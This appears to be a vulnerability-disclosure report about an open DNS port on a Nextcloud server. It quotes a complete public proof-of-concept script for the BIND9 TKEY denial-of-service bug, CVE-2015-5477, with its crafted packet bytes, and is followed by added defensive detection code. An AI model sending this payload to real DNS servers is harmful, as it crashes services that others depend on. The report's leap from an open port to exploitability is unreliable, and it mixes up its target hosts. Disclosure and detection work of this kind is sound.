CVSS2: 7.8 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: COMPLETE
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C
EPSS: 0.973 High
Percentile: 99.8%

Hello Team NextCloud,
In reference to report #217381,
I've reported the DDOS attack via DNS Port at OwnCloud…
And it was successfully patched.
But now I got the same issue at
ci.nextcloud.com
Proof Of Concept:
Here it is the nmap result of ci.nextcloud.com
NMap Scan Results:
Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-08 04:12 PKT
Nmap scan report for ci.nextcloud.com (█████)
Host is up (0.077s latency).
rDNS record for █████████: ███████
Not shown: 96 filtered ports
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
53/tcp open tcpwrapped
80/tcp open tcpwrapped
443/tcp open tcpwrapped
Now here it is the telnet result:
$telnet
telnet> open
(to) ci.nextcloud.com 53
Trying ███...
Connected to ci.nextcloud.com.
Escape character is '^]'.
So this can lead to a serious DDOS attack at doc.owncloud.com using the exploit…
Exploit Link:
https://github.com/elceef/tkeypoc/
Vulnerability Reference CVE Details:
https://vulners.com/cve/CVE-2015-5477
Exploit PoC:
Exploit Title: PoC for BIND9 TKEY DoS
Exploit Author: elceef
Software Link: https://github.com/elceef/tkeypoc/
Version: ISC BIND 9
Tested on: multiple
CVE : CVE-2015-5477
#!/usr/bin/env python
import socket
import sys
print('CVE-2015-5477 BIND9 TKEY PoC')
if len(sys.argv) < 2:
    print('Usage: ' + sys.argv[0] + ' [target]')
    sys.exit(1)
print('Sending packet to ' + sys.argv[1] + ' ...')
payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))
print('Done.')
Thanks :)
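
A defender-side check for the packet shape in the PoC above, added here as an example and not part of the original report or the tkeypoc project: it parses a DNS message and flags a TKEY (type 249) question that arrives with a same-named additional record of a different type. The function names and the benign sample query are constructed for illustration, and the matching rule is an assumption derived from the structure of the quoted payload.

```python
import struct

TKEY = 249  # RR type TKEY (RFC 2930)

def read_name(msg, off):
    """Decode a DNS name at off; return (lowercased name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        n = msg[off]
        if n & 0xC0 == 0xC0:  # compression pointer: follow it, bounded
            end = off + 2 if end is None else end
            off = ((n & 0x3F) << 8) | msg[off + 1]
            if (hops := hops + 1) > 16:
                raise ValueError("compression pointer loop")
            continue
        if n & 0xC0:
            raise ValueError("unsupported label type")
        off += 1
        if n == 0:
            return ".".join(labels).lower(), (off if end is None else end)
        labels.append(msg[off:off + n].decode("latin-1"))
        off += n

def suspicious_tkey_query(msg):
    """True for a TKEY question plus a same-named non-TKEY additional record."""
    try:
        _id, _flags, qd, an, ns, ar = struct.unpack_from("!6H", msg, 0)
        off, tkey_names = 12, set()
        for _ in range(qd):
            name, off = read_name(msg, off)
            if struct.unpack_from("!H", msg, off)[0] == TKEY:
                tkey_names.add(name)
            off += 4  # skip QTYPE and QCLASS
        for i in range(an + ns + ar):
            name, off = read_name(msg, off)
            rtype, _cls, _ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
            off += 10 + rdlen
            if i >= an + ns and rtype != TKEY and name in tkey_names:
                return True
    except (IndexError, struct.error, ValueError):
        return False  # malformed or truncated: leave to other checks
    return False

# Bytes quoted in the report's PoC: question AAA.AAA/TKEY, additional AAA.AAA/type 10.
REPORT_PACKET = bytes.fromhex(
    "4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff "
    "03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41")
# Constructed benign sample: an ordinary A query for example.com.
BENIGN_QUERY = (bytes.fromhex("1234 0100 0001 0000 0000 0000")
                + b"\x07example\x03com\x00" + bytes.fromhex("0001 0001"))
```

A query whose additional record is itself of type TKEY is not flagged, so ordinary TKEY negotiation passes this check.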